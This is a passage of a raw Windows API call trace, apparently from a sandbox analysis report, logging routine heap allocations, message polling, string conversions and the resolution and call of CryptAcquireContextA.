1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.026] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.029] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.029] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.030] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.035] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.036] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0266.036] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.038] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.038] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.038] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.039] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.039] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.039] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.039] 